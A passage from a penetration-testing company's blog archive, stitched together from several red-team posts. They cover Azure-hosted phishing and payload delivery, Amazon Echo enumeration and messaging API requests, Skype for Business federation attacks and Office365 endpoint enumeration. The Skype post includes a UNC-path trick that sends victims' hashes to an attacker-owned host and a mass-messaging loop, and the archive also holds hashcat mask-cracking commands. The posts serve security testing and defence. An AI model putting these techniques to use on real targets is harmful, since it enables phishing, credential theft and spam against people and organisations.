To be specific here, these are services hosted by Microsoft that are typically hosted under a Microsoft sub-domain (windows.net, etc.). By making use of a domain that’s already listed as “Good”, we can hopefully bypass any web proxy filters as we work through an engagement.

This is not a comprehensive list of the Azure services and corresponding domains, but we looked at the Talos reputation scores for some of the primary services. These scores can give us an idea of whether or not a web proxy filter would consider our destination domain as trusted. Each Azure domain that we tested came in as Neutral or Good, so that works in our favor.

Service        Base Domain              Base Web Reputation   Base Weighted Reputation   Subdomain Web Reputation   Subdomain Weighted Reputation
App Services   azurewebsites.net        Neutral               No Score                   Neutral                    No Score
Blob Storage   blob.core.windows.net    Good                  Good                       Good                       Good
File Service   file.core.windows.net    Good                  Good                       Good                       Good
AzureSQL       database.windows.net     Good                  Good                       Good                       Good
Cosmos DB      documents.azure.com      Neutral               Neutral                    Neutral                    Neutral
IoT Hub        azure-devices.net        Neutral               No Score                   Neutral                    No Score

Note: We also looked at the specific subdomains that were attached to these Azure domains and included their reputations in the last two columns. All subdomains were created fresh and did not get seasoned prior to reputation checking. If you’re looking for ways to get your domain trusted by web proxies, take a look at Ryan Gandrud’s post – Adding Web Content Filter Exceptions for Phishing Success.

For the purposes of this blog, we're just going to focus on the App Services, Blob Storage, and AzureSQL services, but there's plenty of opportunities in the other services for additional research.

Hosting Your Phishing Site

The Azure App Services domains scored Neutral or No Score on the reputation scores, but there’s one great benefit from hosting your phishing site with Azure App Services - the SSL certificate. When you use the default options for spinning up an App Services “Web App”, you will be issued an SSL certificate for the site that is verified by Microsoft.


Now I would never encourage someone to pretend to be Microsoft, but I hear that it works pretty well for phishing exercises. One downside here is that the base domain (azurewebsites.net) isn’t the most recognizable domain on the internet, and it might raise some flags from people looking at the URL.

*This is also probably against the Azure terms and conditions, so insert your standard disclaimer here.

**Update: After posting this blog, my test site changed the ownership information on the SSL certificate (after ~5 days of uptime), so your mileage may vary.

As a security professional, I would probably take issue with that domain, but with a Microsoft verified certificate, I might have less apprehension. When the service was introduced, ZDNet actually called it “phishing-friendly”, but as far as we could find, it hasn’t really been adopted for red team operations.

The setup of an Azure App Services “Web App” is really straightforward and takes about 10 minutes total (assuming your phishing page code is all ready to go).

Check out the Microsoft documentation on how to set up your first App Services Web App here - https://docs.microsoft.com/en-us/azure/app-service/app-service-web-overview

Or just try it out on the Azure Portal – https://portal.azure.com

Storing Your Payloads

Setting up your payload delivery is also easy within Azure. Similar to the AWS S3 service, Microsoft has its own public HTTP file storage solution called Blob Storage. Blobs can be set up under a “Storage Account” using a unique name. The unique naming is due to the fact that each storage account is created as a subdomain of the “blob.core.windows.net” domain.


For example, any payloads stored in the “notpayloads” blob would be available at https://notpayloads.blob.core.windows.net/. We also found that these domains already had a “Good” reputation, so it makes them a great option for delivering payloads. If you can grab a quality Blob name (updates, photos, etc.), this will also help with the legitimacy of your payload URL.

I haven’t done extensive testing on long term storage of payloads in blobs, but a 2014 version of Mimikatz was not flagged by anything on upload, so I don’t think that should be an issue.

Setting up Blob storage is also really simple. Just make sure that you set your Blob container “Access policy” to “Blob” or “Container” to allow public access to your payloads.
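For what it's worth, the whole setup can also be scripted with the Azure.Storage cmdlets. The snippet below is a hedged sketch, and the storage account name, key, container, and file names are all placeholders:

# Authenticate to the storage account and create a publicly readable container
$ctx = New-AzureStorageContext -StorageAccountName "notpayloads" -StorageAccountKey "STORAGE_ACCOUNT_KEY"
New-AzureStorageContainer -Name "updates" -Permission Blob -Context $ctx

# Upload the payload; it should then be reachable at https://notpayloads.blob.core.windows.net/updates/update.exe
Set-AzureStorageBlobContent -File .\payload.exe -Container "updates" -Blob "update.exe" -Context $ctx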

If you need a primer, check out Microsoft’s documentation here - https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction

Setting Up Your C2 in Azure

There are several potential options for hosting your C2 infrastructure in Azure, but as a companion to this blog, Scott Sutherland has written up a method for using AzureSQL as a C2 option. He will be publishing that information on the NetSPI blog later this week.

Conclusions / Credits

You may not want to move the entirety of your red team operations to the Azure cloud, but it may be worth using some of the Azure services, considering the benefits that you get from Microsoft’s trusted domains. For the defenders that are reading, you may want to keep a closer eye on the traffic that's going through the domains that we listed above. Security awareness training may also be useful in helping prevent your users from trusting an Azure phishing site.

Special thanks to Alexander Leary for the idea of storing payloads in Blob Storage, and Scott Sutherland for the brainstorming and QA help.

Amazon recently introduced messaging and calling between Echo devices. This allows Echo device owners to communicate with each other via text messages, audio recordings, and voice calls. It’s pretty handy for leaving someone a short note, or for a quick call, but as a hacker, I was more curious about the potential security issues associated with these new features. There have already been a couple of articles recently published that deal with some of the privacy concerns about the features, so we will be going deeper into the technical side of things for this post.

Enumerating Echoes

The “Amazon Alexa” mobile application can take in your phone's contact list and look up potential call contacts via their phone number. I was finding a surprising number of Echos in my contact list, so I figured the next step would be to try enumerating Echos that were not (yet) in my contact list. In order to do this, I needed to import new contacts into my phone with the phone numbers that I wanted to check for Echo devices. Creating the contacts was pretty simple using some Excel magic and the CSV contact import function in Gmail. So I fired up my throwaway Gmail account and added the entire 612-555-XXXX range (10,000 numbers) into my contacts list. For the privacy of the numbers listed below, I’ve changed the second set of numbers in the range to 555. To keep track of each number that I imported, I added the last name as “Test 1234”, where 1234 was the last four digits of the number that I was trying. Taking this route, I was able to identify 65 Echo devices in my phone number’s exchange range.
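If you'd rather skip the Excel step, a rough PowerShell equivalent for generating the import file might look like this (the column headers are a trimmed-down guess at Google's contact CSV template, so adjust them to whatever the importer currently expects):

# Generate 10,000 contacts covering a 612-555-XXXX style range for the Gmail CSV import
$rows = foreach ($i in 0..9999) {
    $last4 = "{0:D4}" -f $i
    [PSCustomObject]@{
        'Given Name'      = 'Echo'
        'Family Name'     = "Test $last4"
        'Phone 1 - Type'  = 'Mobile'
        'Phone 1 - Value' = "+1612555$last4"
    }
}
$rows | Export-Csv -Path .\echo-range.csv -NoTypeInformation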


Given that I was only able to find 65 Echo devices (of the more than 11 million sold), I guess that my number's range isn't very active. Google's upper limit of contacts is 25,000 (Source), so I could potentially cover 2.5 ranges at once with one Gmail account. Given that there are 1,117 exchange ranges in the Minneapolis 612 area code (Source), it would take 447 rounds of this method to cover all of the 612 ranges. Alternatively, you could potentially add additional Google accounts to your phone and cut down the number of contact upload rounds. Please keep in mind that Amazon is monitoring for massive contact uploads, so don't try this at home.

Side Note: For all of the following examples, I proxied the Alexa iOS application traffic through Burp Suite Professional, using an SSL certificate that was trusted by my device.

Once an Echo device is added to your Amazon contact list, you will be able to see that the contact will have a specific Amazon ID tied to their account. These 28-character, alpha-numeric IDs are used with the APIs for interacting with other Echo devices. Here is one of the records that would be returned from my contacts list.
HTTP/1.1 200 OK
Server: Server
Date: Wed, 31 May 2017 23:12:58 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding,User-Agent
Content-Length: 63644

[{"name":{"firstName":"Karl","lastName":"Fosaaen"},"numbers":[{"number":"+1612[REDACTED]","type":"Mobile"}],"number":"+1612[REDACTED]","id":"bf[REDACTED]88","deviceContactId":null,"serverContactId":"bf[REDACTED]88","alexaEnabled":true,"isHomeGroup":false,"isBulkImport":false,"isBlocked":null,"sourceDeviceId":null,"sourceDeviceName":null,"commsId":["amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"],"commsIds":[{"aor":"sips:id.person.amzn1~amzn1.account.MY_AMAZON_ID@amcs-tachyon.com","id":"amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"}],"homeGroupId":null,"commsIdsPreferences":{"amzn1.comms.id.person.amzn1~amzn1.account. MY_AMAZON_ID":{"preferenceGrantedToContactByUser":{},"preferenceGrantedToUserByContact":{}}}},[Truncated]

Sending Text Messages

By proxying the iOS application traffic, we can also see the protocol used for creating text and audio messages. The protocol is pretty simple. Here’s the POST request that we would use to generate a new text message to the “THE_RECIPIENT_ID” user that we would have previously enumerated.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: [Truncated]
Content-Type: application/json
X-Amzn-RequestId: [Truncated]
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 170
Accept-Language: en-us

[{"payload":{"text":"Hey. This is Karl. I'm testing some Amazon stuff. I promise I won't spam you over this. "},"time":"2017-05-31T23:17:20.863Z","type":"message/text"}]

Sending Audio Messages

The audio side of things is a little different. First you have to upload your audio file (which you can overwrite with a proxy), then you send someone a link to the audio file. Here’s what the upload request and response would look like. HTTP POST Request:
POST /v1/media?include-transcript=true HTTP/1.1
Host: project-wink-mss-na.amazon.com
Accept: */*
Authorization: [Truncated]
Accept-Language: en-us
Content-Type: audio/aac
X-Authorization-Act-As: amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID
Content-Length: 39881
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Connection: close
X-Amzn-RequestId: 82DFDC97-65AE-4379-AE2D-77261AD13191
X-Total-Transfer-Length: 99150

[Truncated m4a audio file to be uploaded]
HTTP Server Response:
HTTP/1.1 201 Created
Server: Server
Date: Wed, 31 May 2017 23:26:01 GMT
Content-Type: application/json
Connection: close
Location: https://project-wink-mss-na.amazon.com/v1/media/arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT
Vary: Accept-Encoding,User-Agent
Content-Length: 170

{"id":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0. RD02REDACTEDCOT","transcript":null,"transcriptStatus":null}
The "id" above can then be used for an audio message, in a request that looks like this.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: DEF9FF9C-86EC-4C2E-BFFB-8C6D2A601D31
Content-Type: application/json
X-Amzn-RequestId: 9F4439B8-66FB-496B-820F-E7A96089F588
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 205
Accept-Language: en-us

[{"payload":{"mediaId":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT"},"time":"2017-05-31T22:50:06.005Z","type":"message/audio"}]
At this point, the audio message will be delivered to the recipient in the mobile app, or the Echo will let the recipient know there’s a new message.

Next Steps

So at this point, we’ve enumerated a city’s worth of Echo devices, figured out how to send text and audio messages to all of them, and we have a moral obligation to do the right thing. In the spirit of the last item, I've been in contact with the Amazon security team about this and they've been really great to work with on the disclosure process. They have already implemented some controls to prevent abuse with these features, and I'm looking forward to diving into the next set of features that they add to the Echo devices. [post_title] => Speaking to a City of Amazon Echoes [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => speaking-to-a-city-of-amazon-echoes [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:52:01 [post_modified_gmt] => 2021-06-08 21:52:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7688 [menu_order] => 254 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [24] => WP_Post Object ( [ID] => 6445 [post_author] => 10 [post_date] => 2016-07-21 07:00:21 [post_date_gmt] => 2016-07-21 07:00:21 [post_content] => Federated Skype for Business is a handy way to allow businesses to communicate with each other over a common instant messaging platform. From a security standpoint, the open exchange of information between businesses is a little concerning. NetSPI first started running into instances of federated Skype for Business (at that time Lync) about two years ago. We had opened up federation on our Skype setup and found that we could IM with some of our clients. We also found out that we could see their current availability. This was a little concerning to me at the time, but I was busy, so I didn’t look into it. I was finally able to really start digging into Skype federation last fall and it’s been a really interesting research subject.

The Basics

Skype federation works by setting up an internet-facing federated endpoint that allows outside domains to connect and send messages through to another domain. Basically, Business A can talk to Business B if both of them have the proper federation set up. There are a couple of ways that you can set up federation, but most of the domains that we've run into so far just have open federation enabled. You can restrict it by domain, but I have not seen this implemented as frequently. Being able to Skype chat with clients and other businesses could be handy, but what can we do with this as pen testers? For starters:
  • Validate email addresses
  • Get Skype availability and Out-of-Office statuses
  • Send phishing messages via Skype

Setting up Your Test Environment

Since you may not have federated Skype for Business (or Lync) at your disposal, and you probably don’t want to set up a server for yourself (I’ve heard it’s rough), you can just go to the cloud. This may sound like a plug for Microsoft services, but they are a reasonably priced option for testing this stuff out. You can go month to month ($6/month) or a full year ($5/month) and get federated Skype for Business services direct from Microsoft (See Here). It’s really easy to set up and if you only need it for an engagement, it’s pretty easy to fire up for a month. You will have to specifically enable domain federation through the web interface, but it’s pretty easy. Go to the Skype for Business admin center, select organization, and change the external access to “On except for blocked domains”. Also check the “public IM connectivity” button too. Once you have a federated Skype for Business domain set up, you just need the Skype for Business client (available on the Microsoft Office Portal) installed on your machine to start poking around. Let’s take a look at a sample domain. Here’s what we see when we try to communicate with an email address that is not federated with Skype.

We can see that the email address is listed in full and we get "Presence unknown" for the current status. Here’s what a live federated email address will look like. (Note the Full Name, Job Title, and Status)

Here's what it looks like when I open up conversations with a bunch of CEOs from other federated companies. So we have a full name, job title, and current status. This is handy for one-off targeting of individuals, but what if we want to target a larger list? We can use the Lync SDK and some PowerShell to do that.

The Lync (Skype for Business) SDK

This can be kind of a pain to properly set up, so follow these steps. I know Visual Studio 2010 is old, but it’s the easiest way to get the Lync SDK to work. This should work. I’ve gone through this on a Windows 10 VM and had no issues. If you have issues with it, feel free to leave a comment. Once you have the SDK installed, we can start wrapping the SDK functions with PowerShell to automate our attacks. I’ve put together a few functions (outlined below) that we can use to start attacking these federated Skype for Business interfaces. Get the module here: https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1 All of these functions should be working, and there's a few more on the way (along with better documentation). Feel free to comment on the GitHub page with any feedback. If you have issues importing the Lync SDK DLL, do a search on your system for "Microsoft.Lync.Model.dll" and change your path in the module. If you followed the steps above, it should be in the default path.

Overview of Module Functions

Validate an email and get its status - Single Email
Get-SkypeStatus -email test@example.com

Email         : test@example.com
Title         : Chief Example Officer
Full Name     : Testing McTestface
Status        : Available
Out Of Office : False

*Side note - Since there is sometimes a federation delay, you may not get a user's status back immediately. It helps if you run the function a couple of times (2-3). This can be done by using the "attempts" flag. You may end up with duplicates if you do multiple attempts, but you'll probably have better coverage.

Validate emails and get statuses - List Input
Get-SkypeStatus -inputFile C:\Temp\emails.txt | ft -auto

Email                       Title          Full Name   Status        Out Of Office
-----                       -----          ---------   ------        -------------
FakeName1@example.com      Consultant      FakeName 1  Away          False       
FakeName2@example.com      Accountant      FakeName 2  Away          False       
FakeName3@example.com      Intern          FakeName 3  Away          False       
FakeName4@example.com      Lead Intern     FakeName 4  Out of Office True        
FakeName5@example.com      Associate       FakeName 5  Available     False       
FakeName6@example.com      Somebody        FakeName 6  Offline       False       
FakeName7@example.com      Senior Somebody FakeName 7  Offline       False      
FakeName8@example.com      Marketing Guru  FakeName 8  Away          False       
FakeName9@example.com      IT “Engineer”   FakeName 9  Offline
Send a message - Single User
Invoke-SendSkypeMessage -email test@example.com -message "Hello World"
Sent the following message to test@example.com:
Hello World
Send a message - Multiple Users
get-content emails.txt | foreach {Invoke-SendSkypeMessage -email $_ -message "Hello World"}
Sent the following message to test@example.com:
Hello World

Sent the following message to test2@example.com:
Hello World
*If you don't feel like piping get-content, you can just use the "inputFile" parameter here as well.
Start a group message
Invoke-SendGroupSkypeMessage -emails "test@example.com, test1@example.com" -message "testing"
Sent the following message to 2 users:
testing

*You can also use an input file here as well.

Send a million messages**
for ($i = 0; $i -lt 1000000; $i++){Invoke-SendSkypeMessage -email test@example.com -message "Hello $i"}
Sent the following message to test@example.com:
Hello 0
Sent the following message to test@example.com:
Hello 1
Sent the following message to test@example.com:
Hello 2
Sent the following message to test@example.com:
Hello 3
...
**For the record, Skype will probably not be happy with you if you try to open a million conversations. My Skype client starts crashing when it takes up around 1.5 GB of memory.

Current Exposure

So how big of an exposure is this? Since I see federation pretty regularly with our clients, I decided to go out and check the internet for other domains that support Skype federation. There are a couple of ways that we can identify potential federated Skype for Business domains. We'll start with the Alexa top 1 million list and work down from there, first checking which domains have the ms=ms12345678 records. These are commonly placed in DNS TXT records so that Microsoft can validate the domain that is being federated.

47,455 of the top 1 million have “ms=ms*” records

Next we’ll take a look at how many of those "MS" domains have SIP or Microsoft federation specific SRV records enabled.

_sip._tcp.example.com -  9,395 Records

_sip._tls.example.com - 28,719 Records

_sipfederationtls._tcp.example.com - 28,537 Records
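If you just want to check a single domain for these records yourself, the built-in Resolve-DnsName cmdlet covers both lookups (example.com is a placeholder):

$domain = "example.com"
# Microsoft domain-validation TXT record (ms=msXXXXXXXX)
Resolve-DnsName -Name $domain -Type TXT -ErrorAction SilentlyContinue |
    Where-Object { $_.Strings -match '^ms=ms\d+' }
# SIP / federation SRV records
"_sip._tcp.$domain", "_sip._tls.$domain", "_sipfederationtls._tcp.$domain" |
    ForEach-Object { Resolve-DnsName -Name $_ -Type SRV -ErrorAction SilentlyContinue }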

Taking a unique list of the domains from each of those lists, we end up with 29,551 domains. Now we can try to send messages to the “Administrator” (Default Domain Admin) Skype address.

45 Domains with the “Administrator” account registered on Skype for Business

I'm sure that there are plenty of domains in the list with renamed Administrator accounts and many others that also do not have a Skype user set up for that account, but this is still an interesting number of domain admins that are somewhat exposed.

Further Attacks

As you can see, there's some decent surface area here to start attacking. My current favorite thing to send is UNC paths. Sending someone \\www.microsoftsupport.online\help looks somewhat legitimate and happens to send a Skype user's hash (if they click on it) directly to your attacking system (assuming you own microsoftsupport.online). Once you crack that hash, there's a good chance that the organization has auto-discovery set up for global Skype access. Just log in to Skype for Business with your cracked credentials and start saying hello to your new co-workers (a quick PowerSkype example of the UNC trick follows the list below). Some other options:
  • Want some extra time to run your attack, wait until the entire SOC team is “Away” or “In a Meeting” and fire away.
  • Need an audience? How about a group meeting with everyone (up to 250 users - source) in an organization at the same time?
  • Need to find an office to use for the day during onsite social engineering? Find the person who’s out of office for the day and set up shop in their spot.
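As promised above, here's what sending one of those UNC paths looks like with the PowerSkype function from earlier (the target address and the domain you would need to own are placeholders):

Invoke-SendSkypeMessage -email target@example.com -message "Having Outlook issues? The fix is posted at \\www.microsoftsupport.online\help"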

Final Notes

For the defenders that are reading this, you should probably set up limitations on who you federate with. An overview of the different types of federation can be found here. Additionally, you may want to see if federation really makes sense for your organization. Sources Note: There is some really great prior work that was done by Jason Ostrom, Karl Feinauer, and William Borskey that they presented at DEF CON 20. Take a look at their talk on YouTube or their slides. [post_title] => Attacking Federated Skype for Business with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-federated-skype-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:29 [post_modified_gmt] => 2021-06-08 21:47:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6445 [menu_order] => 291 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [25] => WP_Post Object ( [ID] => 6298 [post_author] => 10 [post_date] => 2016-05-03 07:00:08 [post_date_gmt] => 2016-05-03 07:00:08 [post_content] => The Economy of Mechanism - Office365 SAML assertions vulnerability popped up on my radar this week and it’s been getting a lot of attention. The short version is that you could abuse the SAML authentication mechanisms for Office365 to access any federated domain.  It’s a really serious and interesting issue that you should totally read about, if you haven't already. I have a feeling that this will bring more attention to domain federation attacks and hopefully some new research into the area. Since I’m currently working on some ADFS research (and had this written), I figured now was a good time to release a simple PowerShell tool to enumerate ADFS endpoints using Microsoft’s own APIs. The SAML assertions blog post mentions using this same method to identify federated domains through Microsoft. I’ve wrapped it in PowerShell to make it a little more accessible. This tool should be handy for external pen testers that want to enumerate potential authentication points for federated domain accounts.

Office365 Authentication

If you are trying to authenticate to the Office365 website, Microsoft will do a lookup to see if your email account has authentication managed by Microsoft, or if it is tied to a specific federation server. This can be seen if you proxy your traffic while authenticating to the Office365 portal. Here’s an example request from the client with an email address to check.
GET /common/userrealm/?user=karl@example.com&api-version=2.1&checkForMicrosoftAccount=true HTTP/1.1
Host: login.microsoftonline.com
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
You will get one of two JSON responses back from Microsoft:
  1. A response for a federated domain server endpoint:
    {
      "MicrosoftAccount":1,
      "IsDomainVerified":0,
      "NameSpaceType":"Federated",
      "federation_protocol":"WSTrust",
      "Login":"karl@example.com",
      "AuthURL":"https://adfs.example.com/adfs/ls/?username=karl%40example.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=",
      "DomainName":"example.com",
      "FederationBrandName":"ExampleCompany"
    }
  2. A response for a domain managed by Microsoft:
    {
      MicrosoftAccount=1; 
      NameSpaceType=Managed; 
      Login=support@OtherExample.com; 
      DomainName=OtherExample.com; 
      FederationBrandName=Other Example; 
      TenantBrandingInfo=; 
      cloudinstancename=login.microsoftonline.com
    }
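If you want to poke at the endpoint manually before using the tool below, a quick Invoke-RestMethod call reproduces the same lookup (the email address is a placeholder):

Invoke-RestMethod -Uri "https://login.microsoftonline.com/common/userrealm/?user=karl@example.com&api-version=2.1&checkForMicrosoftAccount=true" |
    Select-Object NameSpaceType, DomainName, FederationBrandName, AuthURL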

The PowerShell tool

To make this easier to parse, I wrote a PowerShell wrapper that makes the request out to Microsoft, parses the JSON response, and returns the information from Microsoft into a datatable. You can also use the -cmd flag to return a command that you can run to try and authenticate to either federated domain servers or to the Microsoft servers. Here’s a link to the code - https://github.com/NetSPI/PowerShell/blob/master/Get-FederationEndpoint.ps1 Here’s an example for each scenario:

Federated Endpoint:

PS C:\> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Make sure you use the correct Username and Domain parameters when you try to authenticate!

Authentication Command:
Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://example.com/ -AppliesTo https://example.com/adfs/services/trust/13/usernamemixed -UserName 'test' -Password 'Summer2016' -Domain 'example.com' -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors

Domain      Type      BrandName           AuthURL                                                                                                                                                     
------      ----      ---------           -------                                                                                                                                                     
example.com Federated Example Company LLC https://example.com/app/[Truncated]
If you're trying to authenticate with this command, it's important to note that this does require you to guess/know the domain username of the target (hence the warning). Frequently, we’ll see that the email address account name (ex. kfosaaen) does not line up with the domain account name (ex. a123456).

Microsoft Managed:

PS C:\> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Domain is managed by Microsoft, try guessing creds this way:

    $msolcred = get-credential
    connect-msolservice -credential $msolcred

Domain      Type    BrandName AuthURL
------      ----    --------- -------
example.com Managed example    NA
If you get back the “managed” response from Microsoft, you can just use the Microsoft AzureAD tools to log in (or attempt logins). Since this returns a datatable, it's easy to pipe in a list of emails to look up federation information on. *Screenshot Note - This was renamed from Get-ADFSEndpoint to Get-FederationEndpoint (10/06/16)

Prerequisites

Both of the authentication methods that the script returns are taken from Microsoft, and since I don't own that code, I can't redistribute it. But here are some links to get the authentication tools from them. The code for Invoke-ADFSSecurityTokenRequest comes from this Microsoft post: The Microsoft managed authentication side (connect-msolservice) comes from the Azure AD PowerShell module. See Here: Finally, here's a nice rundown from Microsoft on how you can connect to any of the Microsoft online services with PowerShell:

Future Work

Taking this further, you could wrap both of these authentication functions to automate brute force password guessing attacks against accounts. Additionally, you could just use this script to enumerate the federation information for the Alexa top 1 million sites. Personally, I won’t be doing that, as I don’t want to send a million requests out to Microsoft. I actually have some other stuff in the works that is directly related to this, but it’s not quite ready to post yet. So keep an eye on the blog for more interesting ADFS attacks. [post_title] => Using PowerShell to Identify Federated Domains [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => using-powershell-identify-federated-domains [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:27 [post_modified_gmt] => 2021-06-08 21:47:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6298 [menu_order] => 293 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 5987 [post_author] => 10 [post_date] => 2016-01-19 07:00:33 [post_date_gmt] => 2016-01-19 07:00:33 [post_content] =>

Over the course of the last year, we’ve cracked a lot of NTLM domain password hashes. During many of our internal penetration tests, we grab the password hashes for all of the domain users and attempt to crack them. Throughout the year, we keep track of the hashes that we’ve cracked and try to gain some insight into how people are choosing passwords, and what we can do to identify some common weaknesses.

At the end of last year, we took a look at the breakdown of lengths, common words, and number of duplicates. Since we captured more than double the number of hashes this year compared to 2014, it got to be a pain to track each and every domain hash cracking job. Going forward, I'm looking to implement some better metrics in our cracking process to better tally these numbers and trends throughout the year.

I’ve compiled a list of our top password masks for the year. This was pretty easy to do, as we keep a running list of the cracked passwords for the year to reuse in other password cracking attempts. I have a handy Perl script  that I feed the cracked list into to determine the masks.
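If Perl isn't your thing, the same idea is easy to approximate in PowerShell. This is just a rough equivalent for turning cracked passwords into hashcat masks, not the actual script we use:

function Get-HcMask {
    param([string]$Password)
    -join ($Password.ToCharArray() | ForEach-Object {
        if     ($_ -cmatch '[A-Z]') { '?u' }
        elseif ($_ -cmatch '[a-z]') { '?l' }
        elseif ($_ -match  '[0-9]') { '?d' }
        else                        { '?s' }
    })
}

# Tally the most common masks in a cracked password list
Get-Content .\cracked.txt | ForEach-Object { Get-HcMask $_ } |
    Group-Object | Sort-Object Count -Descending | Select-Object Count, Name -First 10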

Below is the top 10 list of password masks for 2015’s cracked NTLM passwords.

The Top 10

#    Mask                     Example Password   % of Matching Cracked Passwords
1    ?u?l?l?l?l?l?d?d         Spring15           5.45%
2    ?u?l?l?l?l?l?l?d?d       January15          4.14%
3    ?u?l?l?l?l?l?l?l?d?d     December15         3.10%
4    ?u?l?l?l?d?d?d?d         Fall2015           2.91%
5    ?u?l?l?l?l?d?d?d?d       March2015          2.79%
6    ?u?l?l?l?l?l?d?d?d?d     Winter2015         2.72%
7    ?u?l?l?l?l?l?l?d         January1           2.34%
8    ?u?l?l?l?l?d?d?d         March123           1.98%
9    ?u?l?l?l?l?l?l?l?d       February1          1.72%
10   ?u?l?l?l?l?l?d?d?d       August123          1.51%

Legend
?u = Uppercase letter
?l = Lowercase letter
?d = Decimal number (0-9)

Given that we see some combination of month, day, season, and/or year in every domain that we encounter, I figured I would do all of our examples in that format. For what it’s worth, all of the example passwords here were found in the cracked list.

The top 10 patterns listed above account for 28.66% of the cracked password list.

The top 40 patterns (Download Links Below) for the year account for 50.83% of the passwords that we cracked for the year (not 50% of the hashes gathered for the year). Now please keep in mind that these are just for the cracked passwords. This is a uniqued list. It does not account for duplicates and that means it does not truly reflect the real mileage that you could get with using these on a typical domain. Running the top 10 masks against a recent domain dump allowed us to crack 29% of the hashes in seven and a half minutes. So this does give pretty decent coverage.

Hypothetically, if we cracked 80% of the unique hashes for the year, this list of 40 masks could crack about 40% of the unique domain passwords. Statistics are fun, but since I don’t have solid numbers for every NTLM domain hash that we attempted to crack this year, I can’t really give you this info.

Interesting things to note

  1. Not a single one of our top ten masks has a special character in it.
    1. We actually don’t hit a special character in a mask until #12 on the list. In fact, 63% of the passwords that were cracked did not contain a special character. This was only slightly surprising, as you can still have a password that hits (most) Windows GPO complexity requirements without having special characters.
  2. Of the top 40 patterns, all of the masks are between 8 and 12 characters.
    1. Again, not a big surprise as most domain password length requirements are set at 8 characters.
  3. People really like capitalized words for their passwords.
    1. Only four of the top 40 masks don't follow a dictionary word appended with something. I'd like to say that this is just skewed based on our cracking methodology, but most of the passwords that we're running into contain a dictionary word.

So what do I do with these?

OCLHashcat has support for these mask files. Just use the attack mode 3 (brute force) option and provide the list of masks to use in a text file.
./oclHashcat64.bin -m 1000 hashes.txt -o output.txt -a 3 2015-Top40-Time-Sort.hcmask

When should I use these?

Personally, I would use these after I’ve gone through some dictionaries and rules. Since this is a brute force attack (on a limited key-space) this is not always as efficient as the dictionary and rule-based attacks. However, I have found that this works well for passwords that are not using dictionary words. For example, a dictionary and rule would catch Spring15, but it would be less likely to catch Gralwu94. However, Gralwu94 would be caught by a mask attack in this situation.

How long would this take?

That depends. We have a couple of GPU cracking boxes that we can distribute this against, but if we just ran it on our main cracking system, it would take about three and a half days to complete. That's a really long time. There are a few weird ones in the list that were easy to crack with word lists and rules (resulting in lots of mask hits), but they take a long time to brute force the key space (?u?l?l?l?l?l?l?l?l?l?d?d - Springtime15). I went through and time-stamped each of the top 40 and created a time-sorted list that you can quit using when you start hitting your own time limits.

2015 - Top 40 Masks List

2015 - Time Sorted Top 40 Masks List

